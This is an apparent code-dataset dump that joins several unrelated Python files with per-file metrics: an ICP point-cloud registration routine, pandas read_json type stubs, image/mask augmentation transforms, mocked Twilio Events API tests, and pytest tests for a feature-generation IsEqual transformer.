** 2
)
total_cost = point_plane_cost + self.gamma_ * point_dist_cost
return RegistrationResult(T_source_target, total_cost)
def register_2d(
self,
source_point_cloud,
target_point_cloud,
source_normal_cloud,
target_normal_cloud,
matcher,
num_iterations=1,
compute_total_cost=True,
vis=False,
):
"""
Iteratively register objects to one another using a modified version
of point to plane ICP which only solves for tx and ty (translation
in the plane) and theta (rotation about the z axis). The cost func
is actually PointToPlane_COST + gamma * PointToPoint_COST
Points should be specified in the basis of the planar worksurface.
Parameters
----------
source_point_cloud : :obj:`autolab_core.PointCloud`
source object points
target_point_cloud : :obj`autolab_core.PointCloud`
target object points
source_normal_cloud : :obj:`autolab_core.NormalCloud`
source object outward-pointing normals
target_normal_cloud : :obj:`autolab_core.NormalCloud`
target object outward-pointing normals
matcher : :obj:`PointToPlaneFeatureMatcher`
object to match the point sets
num_iterations : int
the number of iterations to run
compute_total_cost : bool
whether or not to compute the total cost upon termination.
Returns
-------
:obj`RegistrationResult`
results containing source to target transformation and cost
"""
if not isinstance(source_point_cloud, PointCloud) or not isinstance(
target_point_cloud, PointCloud
):
raise ValueError(
"Source and target point clouds must be PointCloud objects"
)
if not isinstance(source_normal_cloud, NormalCloud) or not isinstance(
target_normal_cloud, NormalCloud
):
raise ValueError(
"Source and target normal clouds must be NormalCloud objects"
)
if not isinstance(matcher, PointToPlaneFeatureMatcher):
raise ValueError(
"Feature matcher must be a PointToPlaneFeatureMatcher object"
)
if (
source_point_cloud.num_points != source_normal_cloud.num_points
or target_point_cloud.num_points != target_normal_cloud.num_points
):
raise ValueError(
"Input point clouds must have the same number of points as \
corresponding normal cloud"
)
# extract source and target point and normal data arrays
orig_source_points = source_point_cloud.data.T
orig_target_points = target_point_cloud.data.T
orig_source_normals = source_normal_cloud.data.T
orig_target_normals = target_normal_cloud.data.T
# setup the problem
logging.info("Setting up problem")
normal_norms = np.linalg.norm(orig_target_normals, axis=1)
valid_inds = np.nonzero(normal_norms)
orig_target_points = orig_target_points[valid_inds[0], :]
orig_target_normals = orig_target_normals[valid_inds[0], :]
normal_norms = np.linalg.norm(orig_source_normals, axis=1)
valid_inds = np.nonzero(normal_norms)
orig_source_points = orig_source_points[valid_inds[0], :]
orig_source_normals = orig_source_normals[valid_inds[0], :]
# alloc buffers for solutions
R_sol = np.eye(3)
t_sol = np.zeros([3, 1])
# iterate through
for i in range(num_iterations):
logging.info("Point to plane ICP iteration %d" % (i))
# subsample points
source_subsample_inds = np.random.choice(
orig_source_points.shape[0], size=self.sample_size_
)
source_points = orig_source_points[source_subsample_inds, :]
source_normals = orig_source_normals[source_subsample_inds, :]
target_subsample_inds = np.random.choice(
orig_target_points.shape[0], size=self.sample_size_
)
target_points = orig_target_points[target_subsample_inds, :]
target_normals = orig_target_normals[target_subsample_inds, :]
# transform source points
source_points = (
R_sol.dot(source_points.T)
+ np.tile(t_sol, [1, source_points.shape[0]])
).T
source_normals = (R_sol.dot(source_normals.T)).T
# closest points
corrs = matcher.match(
source_points, target_points, source_normals, target_normals
)
# solve optimal rotation + translation
valid_corrs = np.where(corrs.index_map != -1)[0]
source_corr_points = corrs.source_points[valid_corrs, :]
target_corr_points = corrs.target_points[
corrs.index_map[valid_corrs], :
]
target_corr_normals = corrs.target_normals[
corrs.index_map[valid_corrs], :
]
num_corrs = valid_corrs.shape[0]
if num_corrs == 0:
break
# create A and b matrices for Gauss-Newton step on joint cost
# function
A = np.zeros([3, 3]) # A and b for point to plane cost
b = np.zeros([3, 1])
Ap = np.zeros([3, 3]) # A and b for point to point cost
bp = np.zeros([3, 1])
G = np.zeros([3, 3])
G[:2, 1:] = np.eye(2)
for i in range(num_corrs):
s = source_corr_points[i : i + 1, :].T
t = target_corr_points[i : i + 1, :].T
n = target_corr_normals[i : i + 1, :].T
G[0, 0] = -s[1]
G[1, 0] = s[0]
A += G.T.dot(n).dot(n.T).dot(G)
b += G.T.dot(n).dot(n.T).dot(t - s)
Ap += G.T.dot(G)
bp += G.T.dot(t - s)
v = np.linalg.solve(
A + self.gamma_ * Ap + self.mu_ * np.eye(3),
b + self.gamma_ * bp,
)
# create pose values from the solution
R = np.eye(3)
R = R + skew(np.array([[0], [0], [v[0, 0]]]))
U, S, V = np.linalg.svd(R.astype(np.float))
R = U.dot(V)
t = np.array([[v[1, 0]], [v[2, 0]], [0]])
# incrementally update the final transform
R_sol = R.dot(R_sol)
t_sol = R.dot(t_sol) + t
# compute solution transform
T_source_target = RigidTransform(
R_sol,
t_sol,
from_frame=source_point_cloud.frame,
to_frame=target_point_cloud.frame,
)
total_cost = 0
if compute_total_cost:
# subsample points
source_subsample_inds = np.random.choice(
orig_source_points.shape[0], size=self.cost_sample_size_
)
source_points = orig_source_points[source_subsample_inds, :]
source_normals = orig_source_normals[source_subsample_inds, :]
target_subsample_inds = np.random.choice(
orig_target_points.shape[0], size=self.cost_sample_size_
)
target_points = orig_target_points[target_subsample_inds, :]
target_normals = orig_target_normals[target_subsample_inds, :]
# transform source points
source_points = (
R_sol.dot(source_points.T)
+ np.tile(t_sol, [1, source_points.shape[0]])
).T
source_normals = (R_sol.dot(source_normals.T)).T
# rematch to get the total cost
corrs = matcher.match(
source_points, target_points, source_normals, target_normals
)
valid_corrs = np.where(corrs.index_map != -1)[0]
num_corrs = valid_corrs.shape[0]
if num_corrs == 0:
return RegistrationResult(T_source_target, np.inf)
# get the corresponding points
source_corr_points = corrs.source_points[valid_corrs, :]
target_corr_points = corrs.target_points[
corrs.index_map[valid_corrs], :
]
target_corr_normals = corrs.target_normals[
corrs.index_map[valid_corrs], :
]
# determine total cost
source_target_alignment = np.diag(
(source_corr_points - target_corr_points).dot(
target_corr_normals.T
)
)
point_plane_cost = (1.0 / num_corrs) * np.sum(
source_target_alignment * source_target_alignment
)
point_dist_cost = (1.0 / num_corrs) * np.sum(
np.linalg.norm(source_corr_points - target_corr_points, axis=1)
** 2
)
total_cost = point_plane_cost + self.gamma_ * point_dist_cost
return RegistrationResult(T_source_target, total_cost)
| 37.459459
| 79
| 0.587686
| 2,430
| 20,790
| 4.769136
| 0.104938
| 0.040383
| 0.020709
| 0.019674
| 0.837777
| 0.820347
| 0.817154
| 0.817154
| 0.814393
| 0.814393
| 0
| 0.009672
| 0.333622
| 20,790
| 554
| 80
| 37.527076
| 0.826837
| 0.232179
| 0
| 0.709402
| 0
| 0
| 0.029872
| 0.003422
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014245
| false
| 0.002849
| 0.019943
| 0
| 0.05698
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c3f27f7ea50e689308cc6b5b64d822c4d64ef65
| 1,824
|
py
|
Python
|
data/typing/pandas.io.json._json.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/pandas.io.json._json.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/pandas.io.json._json.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
from typing import *
@overload
def read_json(path_or_buf: str, orient: Literal["split"], lines: bool):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: str, orient: Literal["records"], lines: bool):
"""
usage.dask: 2
"""
...
@overload
def read_json(path_or_buf: str, orient: Literal["index"], lines: bool):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: str, orient: Literal["columns"], lines: bool):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: str, orient: Literal["values"], lines: bool):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: _io.TextIOWrapper):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["split"], lines: bool):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["records"], lines: bool):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: _io.StringIO, orient: Literal["records"], lines: bool):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["index"], lines: bool):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["columns"], lines: bool):
"""
usage.dask: 1
"""
...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["values"], lines: bool):
"""
usage.dask: 1
"""
...
def read_json(
path_or_buf: Union[_io.TextIOWrapper, _io.StringIO, str],
orient: Literal["values", "columns", "index", "records", "split"] = ...,
lines: bool = ...,
):
"""
usage.dask: 13
"""
...
| 16.733945
| 87
| 0.58114
| 221
| 1,824
| 4.579186
| 0.131222
| 0.089921
| 0.141304
| 0.192688
| 0.903162
| 0.880435
| 0.860672
| 0.835968
| 0.805336
| 0.805336
| 0
| 0.010014
| 0.233553
| 1,824
| 108
| 88
| 16.888889
| 0.713877
| 0.099781
| 0
| 0.581395
| 0
| 0
| 0.067082
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.302326
| false
| 0
| 0.023256
| 0
| 0.325581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2c4f562c61f02fc34c131715eaafaed98c5fe393
| 2,746
|
py
|
Python
|
joint_transforms.py
|
Mhaiyang/iccv
|
04a8ee52c2323d7ff5cdf03c0be1466e8180d2eb
|
[
"MIT"
] | 2
|
2019-01-10T03:44:03.000Z
|
2019-05-24T08:50:14.000Z
|
joint_transforms.py
|
Mhaiyang/iccv
|
04a8ee52c2323d7ff5cdf03c0be1466e8180d2eb
|
[
"MIT"
] | null | null | null |
joint_transforms.py
|
Mhaiyang/iccv
|
04a8ee52c2323d7ff5cdf03c0be1466e8180d2eb
|
[
"MIT"
] | null | null | null |
import random
from PIL import Image
class Compose(object):
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, img, mask):
assert img.size == mask.size
for t in self.transforms:
img, mask = t(img, mask)
return img, mask
class RandomRotate(object):
def __call__(self, img, mask):
p = random.random()
# rotate
# if p < 0.25:
# return img.transpose(Image.ROTATE_90), mask.transpose(Image.ROTATE_90)
# if p < 0.5:
# return img.transpose(Image.ROTATE_180), mask.transpose(Image.ROTATE_180)
# if p < 0.75:
# return img.transpose(Image.ROTATE_270), mask.transpose(Image.ROTATE_270)
# flip
if p < 0.5:
return img.transpose(Image.FLIP_LEFT_RIGHT), mask.transpose(Image.FLIP_LEFT_RIGHT)
return img, mask
class Resize(object):
def __init__(self, size):
self.size = tuple(reversed(size)) # size: (h, w) PIL: (w, h)
def __call__(self, img, mask):
assert img.size == mask.size
return img.resize(self.size, Image.BILINEAR), mask.resize(self.size, Image.NEAREST)
# class Compose(object):
# def __init__(self, transforms):
# self.transforms = transforms
#
# def __call__(self, img, mask, edge):
# assert img.size == mask.size
# assert img.size == edge.size
# for t in self.transforms:
# img, mask, edge = t(img, mask, edge)
# return img, mask, edge
#
#
# class RandomRotate(object):
# def __call__(self, img, mask, edge):
# p = random.random()
# # rotate
# # if p < 0.25:
# # return img.transpose(Image.ROTATE_90), mask.transpose(Image.ROTATE_90), edge.transpose(Image.ROTATE_90)
# # if p < 0.5:
# # return img.transpose(Image.ROTATE_180), mask.transpose(Image.ROTATE_180), edge.transpose(Image.ROTATE_180)
# # if p < 0.75:
# # return img.transpose(Image.ROTATE_270), mask.transpose(Image.ROTATE_270), edge.transpose(Image.ROTATE_270)
#
# # # flip
# if p < 0.5:
# return img.transpose(Image.FLIP_LEFT_RIGHT), mask.transpose(Image.FLIP_LEFT_RIGHT), \
# edge.transpose(Image.FLIP_LEFT_RIGHT)
#
# return img, mask, edge
#
#
# class Resize(object):
# def __init__(self, size):
# self.size = tuple(reversed(size)) # size: (h, w) PIL: (w, h)
#
# def __call__(self, img, mask, edge):
# assert img.size == mask.size
# assert img.size == edge.size
# return img.resize(self.size, Image.BILINEAR), mask.resize(self.size, Image.NEAREST), \
# edge.resize(self.size, Image.NEAREST)
| 32.690476
| 122
| 0.595047
| 354
| 2,746
| 4.432203
| 0.124294
| 0.178458
| 0.191205
| 0.117272
| 0.944551
| 0.914595
| 0.912046
| 0.912046
| 0.791587
| 0.791587
| 0
| 0.030045
| 0.27276
| 2,746
| 83
| 123
| 33.084337
| 0.755633
| 0.644574
| 0
| 0.318182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.227273
| false
| 0
| 0.090909
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
2ca246063dfed062b2b4d4cb42d89d0a88bacbde
| 6,848
|
py
|
Python
|
tests/integration/events/v1/test_event_type.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1,362
|
2015-01-04T10:25:18.000Z
|
2022-03-24T10:07:08.000Z
|
tests/integration/events/v1/test_event_type.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 299
|
2015-01-30T09:52:39.000Z
|
2022-03-31T23:03:02.000Z
|
tests/integration/events/v1/test_event_type.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 622
|
2015-01-03T04:43:09.000Z
|
2022-03-29T14:11:00.000Z
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class EventTypeTestCase(IntegrationTestCase):
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.events.v1.event_types.list()
self.holodeck.assert_has_request(Request(
'get',
'https://events.twilio.com/v1/Types',
))
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"types": [],
"meta": {
"page": 0,
"page_size": 10,
"first_page_url": "https://events.twilio.com/v1/Types?PageSize=10&Page=0",
"previous_page_url": null,
"url": "https://events.twilio.com/v1/Types?PageSize=10&Page=0",
"next_page_url": null,
"key": "types"
}
}
'''
))
actual = self.client.events.v1.event_types.list()
self.assertIsNotNone(actual)
def test_read_results_response(self):
self.holodeck.mock(Response(
200,
'''
{
"types": [
{
"date_created": "2020-08-13T13:28:20Z",
"date_updated": "2020-08-13T13:28:20Z",
"type": "com.twilio.messaging.message.delivered",
"schema_id": "Messaging.MessageStatus",
"public": true,
"description": "Messaging- delivered message",
"url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.delivered",
"links": {
"schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
}
},
{
"date_created": "2020-08-13T13:28:19Z",
"date_updated": "2020-08-13T13:28:19Z",
"type": "com.twilio.messaging.message.failed",
"schema_id": "Messaging.MessageStatus",
"public": true,
"description": "Messaging- failed message",
"url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.failed",
"links": {
"schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
}
}
],
"meta": {
"page": 0,
"page_size": 20,
"first_page_url": "https://events.twilio.com/v1/Types?PageSize=20&Page=0",
"previous_page_url": null,
"url": "https://events.twilio.com/v1/Types?PageSize=20&Page=0",
"next_page_url": null,
"key": "types"
}
}
'''
))
actual = self.client.events.v1.event_types.list()
self.assertIsNotNone(actual)
def test_read_results_with_schema_id_response(self):
self.holodeck.mock(Response(
200,
'''
{
"types": [
{
"date_created": "2020-08-13T13:28:20Z",
"date_updated": "2020-08-13T13:28:20Z",
"type": "com.twilio.messaging.message.delivered",
"schema_id": "Messaging.MessageStatus",
"public": true,
"description": "Messaging- delivered message",
"url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.delivered",
"links": {
"schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
}
},
{
"date_created": "2020-08-13T13:28:19Z",
"date_updated": "2020-08-13T13:28:19Z",
"type": "com.twilio.messaging.message.failed",
"schema_id": "Messaging.MessageStatus",
"public": true,
"description": "Messaging- failed message",
"url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.failed",
"links": {
"schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
}
}
],
"meta": {
"page": 0,
"page_size": 20,
"first_page_url": "https://events.twilio.com/v1/Types?SchemaId=Messaging.MessageStatus&PageSize=20&Page=0",
"previous_page_url": null,
"url": "https://events.twilio.com/v1/Types?SchemaId=Messaging.MessageStatus&PageSize=20&Page=0",
"next_page_url": null,
"key": "types"
}
}
'''
))
actual = self.client.events.v1.event_types.list()
self.assertIsNotNone(actual)
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.events.v1.event_types("type").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://events.twilio.com/v1/Types/type',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"date_created": "2020-08-13T13:28:20Z",
"date_updated": "2020-08-13T13:28:20Z",
"type": "com.twilio.messaging.message.delivered",
"schema_id": "Messaging.MessageStatus",
"public": true,
"description": "Messaging- delivered message",
"url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.delivered",
"links": {
"schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
}
}
'''
))
actual = self.client.events.v1.event_types("type").fetch()
self.assertIsNotNone(actual)
| 38.044444
| 127
| 0.467874
| 591
| 6,848
| 5.2978
| 0.143824
| 0.063239
| 0.097732
| 0.114979
| 0.902268
| 0.896838
| 0.896838
| 0.882466
| 0.867135
| 0.851166
| 0
| 0.052002
| 0.401869
| 6,848
| 179
| 128
| 38.256983
| 0.712402
| 0.015917
| 0
| 0.630435
| 1
| 0
| 0.049771
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 1
| 0.130435
| false
| 0
| 0.086957
| 0
| 0.23913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cbeab9c2464e33c517b99aa99ac5d2959c336a8
| 8,457
|
py
|
Python
|
gators/feature_generation/tests/test_is_equal.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 4
|
2021-10-29T18:20:52.000Z
|
2022-03-31T22:53:03.000Z
|
gators/feature_generation/tests/test_is_equal.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 1
|
2022-02-21T20:02:16.000Z
|
2022-02-21T20:02:16.000Z
|
gators/feature_generation/tests/test_is_equal.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 5
|
2021-11-17T20:16:54.000Z
|
2022-02-21T18:21:02.000Z
|
# License: Apache-2.0
import databricks.koalas as ks
import numpy as np
import pandas as pd
import pytest
from pandas.testing import assert_frame_equal
from gators.feature_generation.is_equal import IsEqual
ks.set_option("compute.default_index_type", "distributed-sequence")
@pytest.fixture
def data():
X = pd.DataFrame(
{"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
)
X_expected = pd.DataFrame(
{
"A": [99.0, 1.0, 2.0],
"B": [99.0, 4.0, 5.0],
"C": [99.0, 7.0, 8.0],
"A__is__B": [1.0, 0.0, 0.0],
"A__is__C": [1.0, 0.0, 0.0],
}
)
obj = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(X)
return obj, X, X_expected
@pytest.fixture
def data_int16():
X = pd.DataFrame(
{"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
).astype(np.int16)
X_expected = pd.DataFrame(
{
"A": [99.0, 1.0, 2.0],
"B": [99.0, 4.0, 5.0],
"C": [99.0, 7.0, 8.0],
"A__is__B": [1.0, 0.0, 0.0],
"A__is__C": [1.0, 0.0, 0.0],
}
).astype(np.int16)
obj = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(X)
return obj, X, X_expected
@pytest.fixture
def data_obj():
X = pd.DataFrame(
{
"A": ["a", "b", "c"],
"B": ["a", "f", "e"],
"C": ["a", "p", "d"],
"D": [1, 2, 3],
}
)
X_expected = pd.DataFrame(
{
"A": ["a", "b", "c"],
"B": ["a", "f", "e"],
"C": ["a", "p", "d"],
"D": [1, 2, 3],
"A__is__B": [1.0, 0.0, 0.0],
"A__is__C": [1.0, 0.0, 0.0],
}
)
obj = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(X)
return obj, X, X_expected
@pytest.fixture
def data_names():
X = pd.DataFrame(
{"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
)
X_expected = pd.DataFrame(
{
"A": [99.0, 1.0, 2.0],
"B": [99.0, 4.0, 5.0],
"C": [99.0, 7.0, 8.0],
"A==B": [1.0, 0.0, 0.0],
"A==C": [1.0, 0.0, 0.0],
}
)
obj = IsEqual(
columns_a=list("AA"), columns_b=list("BC"), column_names=["A==B", "A==C"]
).fit(X)
return obj, X, X_expected
@pytest.fixture
def data_ks():
X = ks.DataFrame(
{"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
)
X_expected = pd.DataFrame(
{
"A": [99.0, 1.0, 2.0],
"B": [99.0, 4.0, 5.0],
"C": [99.0, 7.0, 8.0],
"A__is__B": [1.0, 0.0, 0.0],
"A__is__C": [1.0, 0.0, 0.0],
}
)
obj = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(X)
return obj, X, X_expected
@pytest.fixture
def data_int16_ks():
X = ks.DataFrame(
{"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
).astype(np.int16)
X_expected = pd.DataFrame(
{
"A": [99.0, 1.0, 2.0],
"B": [99.0, 4.0, 5.0],
"C": [99.0, 7.0, 8.0],
"A__is__B": [1.0, 0.0, 0.0],
"A__is__C": [1.0, 0.0, 0.0],
}
).astype(np.int16)
obj = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(X)
return obj, X, X_expected
@pytest.fixture
def data_obj_ks():
X = ks.DataFrame(
{
"A": ["a", "b", "c"],
"B": ["a", "f", "e"],
"C": ["a", "p", "d"],
"D": [1, 2, 3],
}
)
X_expected = pd.DataFrame(
{
"A": ["a", "b", "c"],
"B": ["a", "f", "e"],
"C": ["a", "p", "d"],
"D": [1, 2, 3],
"A__is__B": [1.0, 0.0, 0.0],
"A__is__C": [1.0, 0.0, 0.0],
}
)
obj = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(X)
return obj, X, X_expected
@pytest.fixture
def data_names_ks():
X = ks.DataFrame(
{"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
)
X_expected = pd.DataFrame(
{
"A": [99.0, 1.0, 2.0],
"B": [99.0, 4.0, 5.0],
"C": [99.0, 7.0, 8.0],
"A==B": [1.0, 0.0, 0.0],
"A==C": [1.0, 0.0, 0.0],
}
)
obj = IsEqual(
columns_a=list("AA"), columns_b=list("BC"), column_names=["A==B", "A==C"]
).fit(X)
return obj, X, X_expected
def test_pd(data):
obj, X, X_expected = data
X_new = obj.transform(X)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_ks(data_ks):
obj, X, X_expected = data_ks
X_new = obj.transform(X)
assert_frame_equal(X_new.to_pandas(), X_expected)
def test_pd_np(data):
obj, X, X_expected = data
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values.astype(np.float64))
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_ks_np(data_ks):
obj, X, X_expected = data_ks
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values.astype(np.float64))
assert_frame_equal(X_new, X_expected)
def test_int16_pd(data_int16):
obj, X, X_expected = data_int16
X_new = obj.transform(X)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_int16_ks(data_int16_ks):
obj, X, X_expected = data_int16_ks
X_new = obj.transform(X)
assert_frame_equal(X_new.to_pandas(), X_expected)
def test_int16_pd_np(data_int16):
obj, X, X_expected = data_int16
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_int16_ks_np(data_int16_ks):
obj, X, X_expected = data_int16_ks
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values)
assert_frame_equal(X_new, X_expected)
def test_obj(data_obj):
obj, X, X_expected = data_obj
X_new = obj.transform(X)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_obj_ks(data_obj_ks):
obj, X, X_expected = data_obj_ks
X_new = obj.transform(X)
assert_frame_equal(X_new.to_pandas(), X_expected)
def test_obj_np(data_obj):
obj, X, X_expected = data_obj
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_obj_ks_np(data_obj_ks):
obj, X, X_expected = data_obj_ks
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values)
assert_frame_equal(X_new, X_expected)
def test_names_pd(data_names):
obj, X, X_expected = data_names
X_new = obj.transform(X)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_names_ks(data_names_ks):
obj, X, X_expected = data_names_ks
X_new = obj.transform(X)
assert_frame_equal(X_new.to_pandas(), X_expected)
def test_names_pd_np(data_names):
obj, X, X_expected = data_names
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values.astype(np.float64))
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_names_ks_np(data_names_ks):
obj, X, X_expected = data_names_ks
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values.astype(np.float64))
assert_frame_equal(X_new, X_expected)
def test_input():
with pytest.raises(TypeError):
_ = IsEqual(columns_a=0, columns_b=["B"])
with pytest.raises(TypeError):
_ = IsEqual(columns_a=["A"], columns_b=0)
with pytest.raises(TypeError):
_ = IsEqual(columns_a=["A"], columns_b=["B"], column_names=0)
with pytest.raises(ValueError):
_ = IsEqual(columns_a=["A"], columns_b=["B", "C"])
with pytest.raises(ValueError):
_ = IsEqual(columns_a=["A"], columns_b=["B"], column_names=["x", "y"])
with pytest.raises(ValueError):
_ = IsEqual(columns_a=[], columns_b=[])
| 27.192926
| 81
| 0.554334
| 1,414
| 8,457
| 3.062235
| 0.053748
| 0.133025
| 0.033256
| 0.029561
| 0.933487
| 0.928406
| 0.92194
| 0.893533
| 0.893533
| 0.83649
| 0
| 0.065138
| 0.257538
| 8,457
| 310
| 82
| 27.280645
| 0.624462
| 0.002247
| 0
| 0.722222
| 0
| 0
| 0.036155
| 0.003082
| 0
| 0
| 0
| 0
| 0.06746
| 1
| 0.099206
| false
| 0
| 0.02381
| 0
| 0.154762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cbf45500ead174aee8c0ff61d6bc27efc4de5a9
| 40,132
|
py
|
Python
|
hw3/normal_part.py
|
shinshiner/CS420-Machine-Learning
|
dacb1b5e5caef2be523a0b56af81db3f449049d0
|
[
"MIT"
] | 6
|
2019-05-07T02:38:43.000Z
|
2022-03-14T07:46:59.000Z
|
hw3/normal_part.py
|
shinshiner/CS420-Machine-Learning
|
dacb1b5e5caef2be523a0b56af81db3f449049d0
|
[
"MIT"
] | null | null | null |
hw3/normal_part.py
|
shinshiner/CS420-Machine-Learning
|
dacb1b5e5caef2be523a0b56af81db3f449049d0
|
[
"MIT"
] | null | null | null |
